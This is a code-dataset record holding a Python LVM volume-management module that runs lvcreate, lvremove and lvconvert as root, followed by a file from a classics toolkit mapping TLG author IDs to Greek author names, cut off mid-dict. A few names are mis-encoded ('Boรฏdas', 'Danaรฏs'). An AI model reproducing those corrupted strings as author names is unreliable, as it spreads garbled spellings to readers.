self._execute = executor
self.vg_thin_pool = None
if create_vg and physical_volumes is not None:
self.pv_list = physical_volumes
try:
self._create_vg(physical_volumes)
except putils.ProcessExecutionError as err:
LOG.exception(_('Error creating Volume Group'))
LOG.error(_('Cmd :%s') % err.cmd)
LOG.error(_('StdOut :%s') % err.stdout)
LOG.error(_('StdErr :%s') % err.stderr)
raise VolumeGroupCreationFailed(vg_name=self.vg_name)
if self._vg_exists() is False:
LOG.error(_('Unable to locate Volume Group %s') % vg_name)
raise VolumeGroupNotFound(vg_name=vg_name)
if lvm_type == 'thin':
pool_name = "%s-pool" % self.vg_name
if self.get_volume(pool_name) is None:
self.create_thin_pool(pool_name)
else:
self.vg_thin_pool = pool_name
def _size_str(self, size_in_g):
if '.00' in size_in_g:
size_in_g = size_in_g.replace('.00', '')
if int(size_in_g) == 0:
return '100m'
return '%sg' % size_in_g
def _vg_exists(self):
"""Simple check to see if VG exists.
:returns: True if vg specified in object exists, else False
"""
exists = False
cmd = ['vgs', '--noheadings', '-o', 'name']
(out, err) = self._execute(*cmd, root_helper='sudo', run_as_root=True)
if out is not None:
volume_groups = out.split()
if self.vg_name in volume_groups:
exists = True
return exists
def _create_vg(self, pv_list):
cmd = ['vgcreate', self.vg_name, ','.join(pv_list)]
self._execute(*cmd, root_helper='sudo', run_as_root=True)
def _get_vg_uuid(self):
(out, err) = self._execute('vgs', '--noheadings',
'-o uuid', self.vg_name)
if out is not None:
return out.split()
else:
return []
@staticmethod
def supports_thin_provisioning():
"""Static method to check for thin LVM support on a system.
:returns: True if supported, False otherwise
"""
cmd = ['vgs', '--version']
(out, err) = putils.execute(*cmd, root_helper='sudo', run_as_root=True)
lines = out.split('\n')
for line in lines:
if 'LVM version' in line:
version_list = line.split()
version = version_list[2]
if '(2)' in version:
version = version.replace('(2)', '')
version_tuple = tuple(map(int, version.split('.')))
if version_tuple >= (2, 2, 95):
return True
return False
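# Illustration (added comment, based on an assumed 'vgs --version' output
# format): a line such as 'LVM version:     2.02.98(2) (2012-10-15)' splits
# so that version_list[2] == '2.02.98(2)', the '(2)' suffix is stripped, and
# (2, 2, 98) >= (2, 2, 95) makes the method return True.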
@staticmethod
def get_all_volumes(vg_name=None):
"""Static method to get all LV's on a system.
:param vg_name: optional, gathers info for only the specified VG
:returns: List of Dictionaries with LV info
"""
cmd = ['lvs', '--noheadings', '--unit=g', '-o', 'vg_name,name,size']
if vg_name is not None:
cmd += [vg_name]
(out, err) = putils.execute(*cmd, root_helper='sudo', run_as_root=True)
lv_list = []
if out is not None:
volumes = out.split()
for vg, name, size in izip(*[iter(volumes)] * 3):
lv_list.append({"vg": vg, "name": name, "size": size})
return lv_list
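# Illustration (added comment) of the parsing above: with '--noheadings' the
# output is whitespace-separated triples, e.g. '  vg0 vol-1 1.00g\n  vg0 vol-2 2.00g\n';
# out.split() flattens that to six tokens and izip(*[iter(volumes)] * 3)
# regroups them as (vg, name, size), yielding two dicts in lv_list.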
def get_volumes(self):
"""Get all LV's associated with this instantiation (VG).
:returns: List of Dictionaries with LV info
"""
self.lv_list = self.get_all_volumes(self.vg_name)
return self.lv_list
def get_volume(self, name):
"""Get reference object of volume specified by name.
:returns: dict representation of Logical Volume if exists
"""
ref_list = self.get_volumes()
for r in ref_list:
if r['name'] == name:
return r
@staticmethod
def get_all_physical_volumes(vg_name=None):
"""Static method to get all PVs on a system.
:param vg_name: optional, gathers info for only the specified VG
:returns: List of Dictionaries with PV info
"""
cmd = ['pvs', '--noheadings',
'--unit=g',
'-o', 'vg_name,name,size,free',
'--separator', ':']
if vg_name is not None:
cmd += [vg_name]
(out, err) = putils.execute(*cmd, root_helper='sudo', run_as_root=True)
pv_list = []
if out is not None:
pvs = out.split()
for pv in pvs:
fields = pv.split(':')
pv_list.append({'vg': fields[0],
'name': fields[1],
'size': fields[2],
'available': fields[3]})
return pv_list
def get_physical_volumes(self):
"""Get all PVs associated with this instantiation (VG).
:returns: List of Dictionaries with PV info
"""
self.pv_list = self.get_all_physical_volumes(self.vg_name)
return self.pv_list
@staticmethod
def get_all_volume_groups(vg_name=None):
"""Static method to get all VGs on a system.
:param vg_name: optional, gathers info for only the specified VG
:returns: List of Dictionaries with VG info
"""
cmd = ['vgs', '--noheadings',
'--unit=g', '-o',
'name,size,free,lv_count,uuid',
'--separator', ':']
if vg_name is not None:
cmd += [vg_name]
(out, err) = putils.execute(*cmd, root_helper='sudo', run_as_root=True)
vg_list = []
if out is not None:
vgs = out.split()
for vg in vgs:
fields = vg.split(':')
vg_list.append({'name': fields[0],
'size': fields[1],
'available': fields[2],
'lv_count': fields[3],
'uuid': fields[4]})
return vg_list
def update_volume_group_info(self):
"""Update VG info for this instantiation.
Used to update member fields of object and
provide a dict of info for caller.
:returns: Dictionaries of VG info
"""
vg_list = self.get_all_volume_groups(self.vg_name)
if len(vg_list) != 1:
LOG.error(_('Unable to find VG: %s') % self.vg_name)
raise VolumeGroupNotFound(vg_name=self.vg_name)
self.vg_size = vg_list[0]['size']
self.vg_free_space = vg_list[0]['available']
self.vg_lv_count = vg_list[0]['lv_count']
self.vg_uuid = vg_list[0]['uuid']
if self.vg_thin_pool is not None:
self.vg_size = self.vg_size
return vg_list[0]
def create_thin_pool(self, name=None, size_str=0):
"""Creates a thin provisioning pool for this VG.
The syntax here is slightly different than the default
lvcreate -T, so we'll just write a custom cmd here
and do it.
:param name: Name to use for pool, default is "<vg-name>-pool"
:param size_str: Size to allocate for pool, default is entire VG
"""
if not self.supports_thin_provisioning():
LOG.error(_('Requested to setup thin provisioning, '
'however current LVM version does not '
'support it.'))
return None
if name is None:
name = '%s-pool' % self.vg_name
if size_str == 0:
self.update_volume_group_info()
size_str = self.vg_size
# NOTE(jdg): lvcreate will round up extents
# to avoid issues, let's chop the size off to an int
size_str = re.sub(r'\.\d*', '', size_str)
pool_path = '%s/%s' % (self.vg_name, name)
cmd = ['lvcreate', '-T', '-L', size_str, pool_path]
putils.execute(*cmd,
root_helper='sudo',
run_as_root=True)
self.vg_thin_pool = pool_path
def create_volume(self, name, size_str, lv_type='default', mirror_count=0):
"""Creates a logical volume on the object's VG.
:param name: Name to use when creating Logical Volume
:param size_str: Size to use when creating Logical Volume
:param lv_type: Type of Volume (default or thin)
:param mirror_count: Use LVM mirroring with specified count
"""
size_str = self._size_str(size_str)
cmd = ['lvcreate', '-n', name, self.vg_name]
if lv_type == 'thin':
pool_path = '%s/%s' % (self.vg_name, self.vg_thin_pool)
cmd = ['lvcreate', '-T', '-V', size_str, '-n', name, pool_path]
else:
cmd = ['lvcreate', '-n', name, self.vg_name, '-L', size_str]
if mirror_count > 0:
cmd += ['-m', mirror_count, '--nosync']
terras = int(size_str[:-1]) / 1024.0
if terras >= 1.5:
rsize = int(2 ** math.ceil(math.log(terras) / math.log(2)))
# NOTE(vish): Next power of two for region size. See:
# http://red.ht/U2BPOD
cmd += ['-R', str(rsize)]
self._execute(*cmd,
root_helper='sudo',
run_as_root=True)
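# Worked example (added comment) of the mirror region-size computation above:
# for size_str = '3072g' (3 TiB), terras = 3072 / 1024.0 = 3.0 >= 1.5, so
# rsize = 2 ** ceil(log2(3.0)) = 2 ** 2 = 4 and '-R 4' is appended to cmd.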
def create_lv_snapshot(self, name, source_lv_name, lv_type='default'):
"""Creates a snapshot of a logical volume.
:param name: Name to assign to new snapshot
:param source_lv_name: Name of Logical Volume to snapshot
:param lv_type: Type of LV (default or thin)
"""
source_lvref = self.get_volume(source_lv_name)
if source_lvref is None:
LOG.error(_("Unable to find LV: %s") % source_lv_name)
return False
cmd = ['lvcreate', '--name', name,
'--snapshot', '%s/%s' % (self.vg_name, source_lv_name)]
if lv_type != 'thin':
size = source_lvref['size']
cmd += ['-L', size]
self._execute(*cmd,
root_helper='sudo',
run_as_root=True)
def delete(self, name):
"""Delete logical volume or snapshot.
:param name: Name of LV to delete
"""
self._execute('lvremove',
'-f',
'%s/%s' % (self.vg_name, name),
root_helper='sudo', run_as_root=True)
def revert(self, snapshot_name):
"""Revert an LV from snapshot.
:param snapshot_name: Name of snapshot to revert
"""
self._execute('lvconvert', '--merge',
snapshot_name, root_helper='sudo',
run_as_root=True)
def lv_has_snapshot(self, name):
out, err = self._execute('lvdisplay', '--noheading',
'-C', '-o', 'Attr',
'%s/%s' % (self.vg_name, name))
if out:
out = out.strip()
if (out[0] == 'o') or (out[0] == 'O'):
return True
return False
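# --- Hedged usage sketch (added; not part of the original module) ---
# A minimal way this class is driven, assuming a host with the LVM2 tools and
# a 'sudo' root helper available; the VG and LV names below are hypothetical:
#
#   vg = LVM('cinder-volumes', create_vg=False, lvm_type='default')
#   vg.create_volume('volume-demo', '1', lv_type='default')   # 1 GiB LV
#   vg.create_lv_snapshot('volume-demo-snap', 'volume-demo')
#   print(vg.get_volume('volume-demo'))
#   vg.delete('volume-demo-snap')
#   vg.delete('volume-demo')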
|
apache-2.0
|
kylepjohnson/cltk
|
src/cltk/corpora/grc/tlg/id_author.py
|
4
|
63335
|
ID_AUTHOR = {
"2434": "Aelius Dius Hist.",
"2035": "Athanasius Theol.",
"2012": "Acta Eupli",
"1578": "Phaenias Phil.",
"1220": "Batrachomyomachia",
"1222": "Beros(s)us Astrol. et Hist.",
"0474": "Magnes Comic.",
"0559": "Heron Mech.",
"4138": "Ephraem Syrus Theol.",
"1639": "Pseudo-Auctores Hellenistae (PsVTGr)",
"4075": "Marinus Phil.",
"1413": "Heraclitus Paradox.",
"2120": "Panteleius Epic.",
"2595": "Philo Paradox.",
"2744": "Historia Monachorum In Aegypto",
"1397": "Hegesippus Hist.",
"1634": "Prodicus Soph.",
"2566": "[Agathon] Hist.",
"4291": "Verba In Scripturis De Christo",
"0373": "Melanippides Lyr.",
"2648": "Adespota Papyracea (SH)",
"1817": "Fragmenta Anonyma (PsVTGr)",
"1871": "Bion Hist.",
"1105": "Timaeus Praxidas Astrol.",
"0552": "Archimedes Geom.",
"1407": "Heraclides Lembus Hist.",
"0766": "Alcmaeon Phil.",
"1725": "Theophilus Apol.",
"2391": "Hippostratus Hist.",
"0446": "Dioxippus Comic.",
"2650": "Arrianus Epic.",
"2371": "Chronicon Paschale",
"2657": "Martyrium Ignatii",
"0673": "Aeschines Socraticus Phil.",
"4290": "Lexicon Artis Grammaticae",
"1527": "Nepualius Med. et Phil.",
"2109": "Pseudo-Macarius Scr. Eccl.",
"2571": "Hierocles Phil.",
"1149": "Antonini Pii Imperatoris Epistula",
"0252": "Hermippus Comic.",
"1227": "Blaesus Comic.",
"0726": "Palladius Med.",
"1836": "Anonymi Aulodia",
"1324": "Dionysius Hist.",
"0562": "Marcus Aurelius Antoninus Imperator Phil.",
"4339": "Archelaus Alchem. et Poeta",
"0644": "Aristophanes Gramm.",
"1351": "Epigoni",
"4032": "Anonymi In Aristotelis Librum Primum Analyticorum Posteriorum Commentarium",
"4018": "Asclepius Phil.",
"1843": "Nicomachus Trag.",
"0558": "Hellenica",
"1163": "Claudius Apollinarius Apol.",
"2482": "Daimachus Hist.",
"2397": "Boethus Phil.",
"9009": "Michael Apostolius Paroemiogr.",
"0303": "Phrynichus Trag.",
"1219": "Bato Hist. et Rhet.",
"0647": "Triphiodorus Epic. et Gramm.",
"2547": "Antigonus",
"5004": "Epimerismi",
"1354": "Ergias Hist.",
"1760": "Gaius Suetonius Tranquillus Gramm. et Hist.",
"0721": "Anonymi Medici Med.",
"1172": "Arcesilaus Phil.",
"4287": "Etymologia Alphabeti",
"0399": "Eudoxus Comic.",
"0062": "Lucianus Soph.",
"1489": "Megasthenes Hist.",
"4303": "Lexica In Opera Gregorii Nazianzeni",
"2956": "Sextus Julius Africanus Hist.",
"2894": "Constitutiones Apostolorum",
"0638": "Flavius Philostratus Soph.",
"0040": "Calani Epistula",
"0291": "Alcman Lyr.",
"0337": "Python Trag.",
"0492": "Philonides Comic.",
"1846": "Spintharus Trag.",
"0077": "Periplus Maris Magni",
"1923": "Stesimbrotus Hist.",
"2063": "Gregorius Thaumaturgus Scr. Eccl.",
"0635": "Zeno Phil.",
"0417": "Archippus Comic.",
"0695": "Alcimus Hist.",
"1752": "Xenagoras Geogr. et Hist.",
"0346": "Pompeius Macer [Trag.]",
"0509": "[Myia] Phil.",
"0398": "Simylus Comic.",
"1194": "Aristonicus Gramm.",
"0257": "Philiscus Rhet.",
"0324": "Patrocles Trag.",
"3139": "Laonicus Chalcocondyles Hist.",
"2703": "Anna Comnena Hist.",
"5009": "Scholia In Aeschinem",
"0313": "Theognis Trag.",
"2237": "Theodorus Math.",
"2277": "Hypermenes Hist.",
"4171": "Anonymi In Oppiani Opera",
"0547": "Anaximenes Hist. et Rhet.",
"2995": "Orus Gramm.",
"2331": "Myrsilus Hist.",
"4346": "Menecrates Hist.",
"4374": "Anonymi De Astrologia Dialogus Astrol.",
"5030": "Scholia In Lycophronem",
"0751": "Pseudo-Hippocrates Med.",
"2644": "Sminthes Astron.",
"1321": "Diogenes Phil.",
"1833": "Pratinas Trag.",
"0525": "Pausanias Perieg.",
"1890": "Moderatus Phil.",
"2051": "Himerius Soph.",
"1805": "Vitae Homeri",
"1439": "Hermarchus Phil.",
"2307": "Artemon Hist.",
"0368": "Cydias Lyr.",
"0582": "Paradoxographus Vaticanus",
"1123": "Andron Hist.",
"2970": "Severus Phil.",
"2236": "Eutropius Hist.",
"0458": "Eubulus Comic.",
"0042": "Alexandri Magni Epistulae",
"1907": "Cratippus Hist.",
"0201": "Isyllus Lyr.",
"0404": "Amphis Comic.",
"4174": "Paraphrases In Dionysium Periegetam",
"1587": "Philiades Eleg.",
"0319": "Critias Eleg., Phil. et Trag.",
"1596": "Philolaus Phil.",
"2011": "Martyrium Agapae, Irenae, Chionae Et Sodalium",
"4324": "Synesius Alchem.",
"0730": "Meletius Med.",
"0022": "Nicander Epic.",
"1801": "Parodica Anonyma",
"5045": "Anonymi In Aphthonium Rhet.",
"1260": "[Chersias] Epic.",
"1257": "Charinus Choliamb.",
"2696": "Theodorus Poeta",
"1693": "Sphaerus Phil.",
"1204": "Athenaeus Mech.",
"3143": "Georgius Sphrantzes Hist.",
"3100": "Nicolaus I Mysticus Theol. et Epist.",
"0633": "[Lysis] Phil.",
"2216": "Aristippus Hist.",
"0545": "Claudius Aelianus Soph.",
"1237": "[Callicratidas] Phil.",
"1436": "[Hippodamus] Phil.",
"1726": "Theopompus Epic.",
"0540": "Lysias Orat.",
"1241": "Carmen Naupactium",
"9008": "Macarius Chrysocephalus Paroemiogr.",
"1627": "Polycrates Hist.",
"0571": "Aristocles Paradox.",
"0473": "Machon Comic.",
"2182": "Staphylus Hist.",
"1361": "Eumedes Comic.",
"4237": "Joannes Argyropulus Gramm.",
"4301": "Lexicon Rhetoricum Cantabrigiense",
"0256": "Panarces Scriptor Aenigmatum",
"1604": "Phocylides Eleg. et Gnom.",
"1797": "Choliambica Adespota (ALG)",
"1746": "Valentinus Gnost.",
"0074": "Flavius Arrianus Hist. et Phil.",
"1785": "Paramonus Comic.",
"2002": "Anonymus Seguerianus Rhet.",
"4338": "Theophrastus Alchem. et Poeta",
"2654": "Physiologus",
"0039": "Mithridatis Epistula",
"0500": "Posidippus Comic.",
"2173": "Antileon Hist.",
"0390": "Martyrium Carpi, Papyli Et Agathonicae",
"4326": "Pappus Alchem.",
"1978": "Leo Hist.",
"2148": "Aristodemus Hist.",
"1463": "Liber Enoch",
"2313": "Antisthenes Phil.",
"1228": "[Boeo] Epic.",
"2061": "Asterius Sophista Scr. Eccl.",
"4390": "Democles Hist.",
"1602": "Philoxenus Gramm.",
"4292": "Lexicon De Atticis Nominibus",
"1545": "Ocellus Phil.",
"2055": "Serenus Geom.",
"3156": "Anonymi Exegesis In Hesiodi Theogoniam",
"2968": "Monimus Phil.",
"1212": "Atridarum Reditus",
"0241": "Aristoxenus [Comic.]",
"0043": "Amasis Epistulae",
"1511": "Mimnermus Trag.",
"0031": "Novum Testamentum, New Testament",
"2949": "Acta Barnabae",
"2053": "Paulus Astrol.",
"0388": "Acta Pauli",
"4036": "Proclus Phil.",
"1584": "Pherecydes Hist.",
"0889": "Timesitheus Trag.",
"0661": "Archigenes Med.",
"1783": "Callicrates Comic.",
"2022": "Gregorius Nazianzenus Theol.",
"2019": "Pelagius Alchem.",
"0317": "Acta Joannis",
"0092": "Anonymi Geographiae Expositio Compendiaria",
"0687": "Agaclytus Hist.",
"5026": "Scholia In Homerum",
"4236": "Trophonius Rhet. et Soph.",
"1868": "Damastes Hist.",
"1368": "Evangelium Ebionitum",
"0511": "Theognetus Comic.",
"4097": "Etymologicum Genuinum",
"1338": "Dosiadas Hist.",
"0693": "Albinus Phil.",
"2946": "Priscus Hist. et Rhet.",
"0483": "Nicophon Comic.",
"0097": "Diogenianus Gramm.",
"0508": "Strattis Comic.",
"2247": "Petron Phil.",
"2314": "Diogenes Phil.",
"2158": "Eutychianus Hist.",
"2892": "Maximus Confessor Theol.",
"2384": "Hermias Hist.",
"1390": "Hecataeus Hist.",
"1555": "Pancrates Epic.",
"9022": "Joannes Tzetzes Gramm. et Poeta",
"0059": "Plato Phil.",
"1795": "Chaerion Comic.",
"2546": "Publius Rutilius Rufus Hist.",
"2015": "Testamentum XL Martyrum",
"2001": "Themistius Phil. et Rhet.",
"9006": "Gregorius Paroemiogr.",
"0066": "Dicaearchus Phil.",
"3181": "Nicephorus II Phocas Imperator Tact.",
"1566": "Parmeno Iamb.",
"2945": "Gnomologium Vaticanum",
"4149": "Sophronius Gramm.",
"2000": "Plotinus Phil.",
"0279": "Discipulorum Cantiuncula",
"0445": "Dionysius Comic.",
"2157": "Magnus Hist.",
"1648": "Pyrgion Hist.",
"4017": "Syrianus Phil.",
"0615": "Aspasius Phil.",
"1521": "Vita Et Sententiae Secundi",
"1782": "Augeas Comic.",
"3039": "Joannes Galenus Gramm.",
"0234": "Elegiaca Adespota (IEG)",
"2618": "Didymarchus Poeta",
"0555": "Clemens Alexandrinus Theol.",
"1633": "Praxiteles [Epigr.]",
"1179": "[Arimnestus] Phil.",
"1320": "Diogenes Phil.",
"0401": "Alexander Comic.",
"1136": "Anonymus Presbyter Scr. Eccl.",
"0344": "Melanthius Trag.",
"1970": "Silenus Hist.",
"2115": "Hippolytus Scr. Eccl.",
"4395": "Menetor Hist.",
"4193": "Anonymi In Aristotelis Sophisticos Elenchos Phil.",
"1242": "Canon Librorum",
"1867": "Crito Hist.",
"2533": "Timolaus Hist.",
"2333": "Possis Hist.",
"1174": "Archemachus Hist.",
"2412": "Androetas Hist.",
"1551": "Oracula Sibyllina",
"0442": "Dexicrates Comic.",
"0465": "Heniochus Comic.",
"1311": "Didache XII Apostolorum",
"2020": "Theodosius Gramm.",
"0353": "[Sclerias] Trag.",
"0420": "Aristonymus Comic.",
"0825": "Melito Trag.",
"1792": "Biottus Comic.",
"0240": "Hermolochus Lyr.",
"2187": "Posidonius Hist.",
"1344": "Epica Adespota (CA)",
"0514": "Thugenides Comic.",
"0489": "Philetaerus Comic.",
"0348": "Biotus Trag.",
"0451": "Epicrates Comic.",
"1369": "Evangelium Mariae",
"0506": "Stephanus Comic.",
"1406": "Heraclides Hist.",
"4337": "Heliodorus Alchem. et Poeta",
"2587": "Ariston Phil.",
"3142": "Georgius Pachymeres Hist.",
"1171": "Apollonius Scr. Eccl.",
"5039": "Scholia In Thucydidem",
"0485": "Ophelio Comic.",
"2317": "Hermias Phil.",
"1157": "Apocalypsis Esdrae",
"2615": "Daphitas Gramm. vel Soph.",
"0554": "Chariton Scr. Erot.",
"2219": "Amelesagoras Hist.",
"0250": "Euclides Comic. vel Iamb.",
"0488": "Philemon Junior Comic.",
"2762": "Gennadius I Scr. Eccl.",
"0533": "Callimachus Philol.",
"0209": "Seleucus Lyr.",
"0383": "Alcaeus Lyr.",
"0696": "Alcmaeonis",
"2681": "Diodorus Phil.",
"0298": "Eumelus Epic.",
"1274": "Cleobulus Epigr. et Lyr.",
"1329": "Dionysius Scr. Eccl.",
"0505": "Sotades Comic.",
"1231": "[Bryson] Phil.",
"0522": "Pisander Epic.",
"2021": "Epiphanius Scr. Eccl.",
"1523": "Myron Hist.",
"1188": "Aristocles Phil.",
"1259": "[Charondas Nomographus] [Phil.]",
"4302": "Lexicon Patmense",
"5013": "Scholia In Aratum",
"0469": "Laon Comic.",
"1362": "[Eurytus] Phil.",
"2228": "Menestor Phil.",
"1186": "Aristobulus Judaeus Phil.",
"0374": "Licymnius Lyr.",
"2638": "Philo Poeta",
"0396": "Euphanes Comic.",
"1391": "Hegemon Epic.",
"2466": "Dionysius Hist.",
"2127": "Troilus Soph.",
"4361": "Apomasar Astrol.",
"5034": "Scholia In Pindarum",
"0014": "Demosthenes Orat.",
"2049": "Sallustius Phil.",
"1815": "Sappho et Alcaeus Lyr.",
"1546": "Oechaliae Halosis",
"2040": "Basilius Theol.",
"3027": "Joannes Doxapatres Rhet.",
"0698": "Alexander Rhet.",
"1766": "Tatianus Apol.",
"0561": "Longus Scr. Erot.",
"4311": "Etymologicum Symeonis",
"1835": "Agroetas Hist.",
"2042": "Origenes Theol.",
"0369": "Telesilla Lyr.",
"1643": "Ptolemaeus Gramm.",
"0232": "Archilochus Eleg. et Iamb.",
"4099": "Etymologicum Magnum",
"4016": "Ammonius Phil.",
"4034": "Michael Phil.",
"0750": "Heliodorus Trag.",
"0616": "Polyaenus Rhet.",
"4201": "Joannes Chortasmenus Phil.",
"2548": "Promathion Hist.",
"0601": "[Zaleucus Nomographus] [Phil.]",
"1121": "Anaximenis Milesii Epistulae",
"3063": "Joannes Scylitzes Hist.",
"1599": "Philo Mech.",
"2282": "Melisseus Hist.",
"1229": "[Boeus] Epic.",
"1626": "Polycrates Scr. Eccl.",
"1156": "Apocalypsis Eliae",
"2010": "Martyrium Dasii",
"4340": "Salmanas Alchem.",
"0263": "Solon Nomographus et Poeta",
"0343": "Ezechiel Trag.",
"1381": "Fragmentum Synodicae Epistulae Concilii Caesariensis",
"2234": "Oenopides Phil.",
"2608": "Archebulus Poeta",
"4334": "[Isis Prophetissa] Alchem.",
"4076": "Menander Protector Hist.",
"0009": "Sappho Lyr.",
"0244": "Cleobulina Scriptor Aenigmatum",
"2621": "Diophilus vel Diophila Poeta",
"0493": "Philostephanus Comic.",
"2162": "Aratus Hist.",
"0325": "Astydamas Trag.",
"0019": "Aristophanes Comic.",
"0266": "Tyrtaeus Eleg.",
"1949": "Potamon Hist.",
"2116": "Arcadius Gramm.",
"0690": "Erasistratus Med.",
"1326": "Dionysius Epic.",
"1698": "Telephus Gramm.",
"1507": "[Metopus] Phil.",
"0233": "Hipponax Iamb.",
"4170": "Vitae Pindari Et Varia De Pindaro",
"2027": "Valerius Apsines Rhet.",
"0603": "Silenus Trag.",
"5016": "Scholia In Callimachum",
"5028": "Scholia In Isocratem",
"0649": "Lesbonax Rhet.",
"1141": "Antimachus Epic.",
"1736": "Timonax Hist.",
"2770": "Callinicus Biogr.",
"0443": "Diocles Comic.",
"1386": "Historia Alexandri Magni",
"1771": "Montanus et Montanistae Theol.",
"4392": "Joannes Epiphaniensis Hist.",
"4000": "Aristaenetus Epist.",
"2194": "[Aristides] Hist.",
"3070": "Symeon Logothetes Hist.",
"3045": "Georgius Syncellus Chronogr.",
"2555": "Agesilaus Hist.",
"0083": "Dionysius Geogr.",
"0660": "Apollonius Med.",
"2455": "Aristocreon Hist.",
"1256": "Chares Gnom.",
"5021": "Scholia In Diophantum",
"1332": "[Diotogenes] Phil.",
"0275": "Peirazomene",
"1372": "Evangelium Evae",
"5003": "Erotica Adespota",
"1296": "Cypria",
"0703": "Numenius Poet. Didac.",
"1232": "[Butherus] Phil.",
"2007": "Martyrium Potamiaenae Et Basilidis",
"0604": "Ptolemaeus IV Philopator Trag.",
"3043": "Georgius Monachus Chronogr.",
"5008": "Scholia In Aelium Aristidem",
"4335": "Cleopatra Alchem.",
"2800": "Basilius Scr. Eccl.",
"2635": "Persinus Poeta",
"0478": "Nausicrates Comic.",
"1953": "Hieronymus Hist.",
"0326": "Sophocles Junior Trag.",
"2816": "Joannes Gramm. et Theol.",
"1691": "Sotades Iamb.",
"1569": "Pausanias Attic.",
"1343": "Eparchides Hist.",
"2153": "Bion Math. et Phil.",
"1490": "[Megillus] Phil.",
"0332": "Cleaenetus Trag.",
"1568": "Parthax Hist.",
"0429": "Cephisodorus Comic.",
"1729": "Thrasymachus Rhet. et Soph.",
"2396": "Hyperochus Hist.",
"1430": "Hieronymus Phil.",
"0336": "Crates Poet. Phil.",
"1096": "Euaretus Trag.",
"1216": "Barnabae Epistula",
"1757": "Julius Epic.",
"0312": "Philocles Trag.",
"1574": "Persaeus Phil.",
"9004": "Anonymi In Aristotelis Librum Alterum Analyticorum Posteriorum Commentarium",
"1969": "Philinus Hist.",
"2357": "Gorgon Hist.",
"1411": "Heracliti Ephesii Epistulae",
"1402": "Hephaestion Gramm.",
"2865": "Olympiodorus Diaconus Scr. Eccl.",
"2330": "Scamon Hist.",
"0421": "Aristophon Comic.",
"0515": "Timocles Comic.",
"1786": "Sogenes Comic.",
"4327": "Joannes Archiereus Alchem.",
"2239": "Pythagoristae (D-K) Phil.",
"1327": "Dionis Epistulae",
"4003": "Marcianus Geogr.",
"0205": "Philodamus Lyr.",
"2328": "Diogenes Hist.",
"2474": "Nicander Hist.",
"1371": "Evangelium Petri",
"1132": "Anonymus Alexandri Phil.",
"0044": "Antiochi Regis Epistulae",
"2647": "Zenothemis Geogr.",
"0307": "Neophron Trag.",
"0345": "Apollonides Trag.",
"2742": "Apophthegmata",
"2058": "Philostorgius Scr. Eccl.",
"0058": "Aeneas Tact.",
"2059": "Alexander Theol.",
"2475": "Menecrates Hist.",
"2346": "Andriscus Hist.",
"1270": "Clearchus Phil.",
"1486": "Matron Parodius",
"0749": "Antyllus Med.",
"0254": "Melanthius Eleg. et Trag.",
"1263": "Choerilus Epic.",
"2227": "Paron Phil.",
"0724": "Stephanus Med. et Phil.",
"0481": "Nicolaus Comic.",
"1544": "Nymphis Hist.",
"5022": "Scholia In Euclidem",
"0971": "Oeniades Lyr.",
"0038": "Arcesilai Epistula",
"0624": "Demetrius Hist. et Phil.",
"2611": "Butas Eleg.",
"1450": "Ister Hist.",
"2609": "Asopodorus Iamb.",
"4396": "Timagetus Hist.",
"0447": "Diphilus Comic.",
"0456": "Euangelus Comic.",
"0713": "Anaxagoras Phil.",
"4040": "Photius Lexicogr., Scr. Eccl. et Theol.",
"2270": "Callippus Hist.",
"2589": "Olympiodorus Alchem.",
"0648": "Onasander Tact.",
"0295": "Carmina Popularia (PMG)",
"2322": "Antenor Hist.",
"1224": "Bion Phil.",
"2383": "Diodorus Phil.",
"2387": "Athanis Hist.",
"2117": "Anonymus De Metrorum Ratione",
"2226": "Iccus Phil.",
"3047": "Michael Glycas Astrol. et Hist.",
"4019": "Olympiodorus Phil.",
"0090": "Agathemerus Geogr.",
"0605": "Polybius Rhet.",
"0733": "Cassius Iatrosophista Med.",
"0028": "Antiphon Orat.",
"0564": "Rufus Med.",
"0551": "Appianus Hist.",
"2605": "Agamestor Eleg.",
"0288": "Pisander Epic.",
"0315": "Sthenelus Trag.",
"1632": "Posidippus Epigr.",
"1845": "Callistratus Trag.",
"0752": "Eutecnius Soph.",
"2345": "Agl(a)osthenes Hist.",
"3075": "Pseudo-Mauricius Tact.",
"1713": "Themison Hist.",
"1374": "Evangelium Secundum Hebraeos",
"0538": "Hecataeus Hist.",
"2655": "[Damigeron Magus]",
"0045": "Artaxerxis Epistulae",
"2031": "Sopater Rhet.",
"0876": "Phrynichus II Trag.",
"0490": "Philippides Comic.",
"4037": "Anonymi Paradoxographi",
"0203": "Limenius Lyr.",
"4029": "Procopius Hist.",
"1728": "Theseus Hist.",
"0556": "Asclepiodotus Tact.",
"1679": "Socrates Hist.",
"3173": "Joannes Theol.",
"2230": "Boรฏdas Phil.",
"1483": "Martyrium Et Ascensio Isaiae",
"2118": "Gryllus",
"0088": "Aristoxenus Mus.",
"1269": "Cleanthes Phil.",
"0521": "Epicharmus Comic. et Pseudepicharmea",
"2971": "Georgius Peccator Poeta",
"1211": "Balagrus Hist.",
"0716": "Erotianus Gramm. et Med.",
"4139": "Severianus Scr. Eccl.",
"5017": "Scholia In Demosthenem",
"1498": "Menander Hist.",
"0054": "[Theano] Phil.",
"0364": "Danaรฏs vel Danaรฏdes",
"0544": "Sextus Empiricus Phil.",
"4147": "Florilegium Cyrillianum",
"0536": "Ephorus Hist.",
"0386": "Chilonis Epistula",
"0516": "Timostratus Comic.",
"0339": "Moschion Trag.",
"2617": "Demetrius Poeta",
"0067": "Agatharchides Geogr.",
"1754": "Xenophontis Epistulae",
"0457": "Eubulides Comic.",
"1148": "Antonius Diogenes Scr. Erot.",
"4397": "Myronianus Hist.",
"0282": "Anonymus De Viribus Herbarum",
"1541": "Nostoi",
"1094": "Theodorides Trag.",
"0592": "Hermogenes Rhet.",
"1475": "Maiistas Epic.",
"0602": "Comica Adespota (FCG)",
"1432": "[Hipparchus] Phil.",
"1305": "Democritus Hist.",
"0833": "Anaxion Trag.",
"0472": "Lysippus Comic.",
"2029": "Anonymi Geographia In Sphaera Intelligenda",
"0283": "Heraclides Ponticus Junior Gramm.",
"1625": "Polyclitus Phil.",
"4166": "Vitae Aeschinis",
"3023": "Constantinus VII Porphyrogenitus Imperator Hist.",
"1364": "Evangelium Aegyptium",
"0125": "Zenonis Epistula",
"4021": "David Phil.",
"1146": "Antipater Phil.",
"0466": "Heraclides Comic.",
"1360": "[Euryphamus] Phil.",
"1387": "(H)agias-Dercylus Hist.",
"1688": "Sostratus Gramm.",
"4094": "Choricius Rhet. et Soph.",
"1702": "Testamentum Jobi",
"0579": "Orphica",
"0001": "Apollonius Rhodius Epic.",
"0462": "Euthycles Comic.",
"0455": "Eriphus Comic.",
